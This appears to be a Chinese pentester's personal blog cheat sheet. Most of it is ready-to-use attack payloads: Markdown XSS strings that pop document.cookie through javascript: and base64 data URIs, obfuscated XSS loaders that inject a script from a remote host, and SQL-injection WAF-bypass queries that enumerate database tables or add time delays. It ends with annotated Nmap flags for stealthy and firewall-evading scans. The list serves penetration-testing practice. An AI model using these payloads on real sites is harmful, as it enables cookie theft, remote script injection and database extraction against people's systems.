>我真的太惨了

>外出实习忘记了博客密码

>断更了这么久

>今天终于忍不了了,ssh连上来黑了自己的首页,试图记录点什么

>2019/08/21 --C0d3r1iu

Test Sheet (updating) – 记录日 – C0d3r1iu's Blog

Test Sheet (updating)

一些自用sheet:
 

Markdown XSS Sheet:

 

[a](javascript:prompt(document.cookie))
[a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
![a](javascript:prompt(document.cookie))\
<javascript:prompt(document.cookie)>  
<javascript:alert('XSS')>  
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:alert('XSS'))
![a'"`onerror=prompt(document.cookie)](x)\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)

XSS script Sheet:

 

=s=createElement('script');body.appendChild(s);s.src='url'
<svg/onload=s=createElement('script');body.appendChild(s);s.src='url';>
<iframe/onload=s=createElement('script');body.appendChild(s);s.src='t.cn';height=0 width=0>
<a href="#" onmouseover="var vv='scr';vvv=vv+'ipt';se = document.createElement(vvv);se.src = 'url';document.getElementsByTagName('head')[0].appendChild(se);">test</a>
<a href="#" onmouseover="var vv='scr';vvv=vv+'ipt';se = document.createElement(vvv);se.src ='url';document.getElementsByTagName('head')[0].appendChild(se);"></a>
<input type="image" onmouseover="var vv='script';se = document.createElement(vv);se.src = 'url';document.getElementsByTagName('head')[0].appendChild(se);" style="border:50px solid #fff;" value=" ">
a标签的JavaScript伪协议点击执行:
<a href="javascript:var vv='scr';vvv=vv+'ipt';se = document.createElement(vvv);se.src = 'url';document.getElementsByTagName('head')[0].appendChild(se);">点我</a>

 

Sqli Bypass Sheet:

 

/*!a*/
/*!50000*/
/*!12345*/
/*!13337*/
(/*!%53ELECT*/+/*!50000GROUP_CONCAT(table_name%20SEPARATOR%200x3c62723e)*//**//*!%46ROM*//**//*!INFORMATION_SCHEMA.TABLES*//**//*!%57HERE*//**//*!TABLE_SCHEMA*//**/LIKE/**/DATABASE())
(/*!%53ELECT*/(@x)FROM(/*!%53ELECT*/(@x:=0x00),(@NR:=0),(/*!%53ELECT*/(0)/*!%46ROM*/(/*!%49NFORMATION_%53CHEMA*/./*!%54ABLES*/)/*!%57HERE*/(/*!%54ABLE_%53CHEMA*//**/NOT/**/LIKE/**/0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=/*!CONCAT%0a(*/@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,/*!%74able_%6eame*/,0x3c62723e))))x)
select count(*) from infomation_schema.columns A,infomation_schema.columns B,infomation_schema.columns C #替换延时注入

 

Nmap Quick Check Sheet

 

-sT     TCP connect()扫描,这种方式会在目标主机的日志中记录大批的链接请求以及错误信息。 
-sP     ping扫描,加上这个参数会使用ping扫描,只有主机存活,nmap才会继续扫描,一般最好不加,因为有的主机会禁止ping,却实际存在。
-sS     半开扫描,一般不会记入日志,不过需要root权限。
-sU     udp扫描,但是一般不可靠。
-sA     用来穿过防火墙的规则集,速度慢。
-sV     端口服务及版本
-A      包含了-sV,-O,全面系统检测,启动脚本检测,扫描等。
-P0     扫描之前不使用ping,适用于防火墙禁止ping,比较有用。
-v      显示扫描进程
-O       探测目标系统的漏洞,容易误报
-oN/-oX/-oG     将报告写入文件,格式分别为正常(自定义.txt),XML,grepable。
-iL      扫描主机列表。
-sC   --script=default  默认的脚本扫描,主要是搜集各种应用服务的信息。

 

Comments are closed.

顶部
护眼
搜索
分享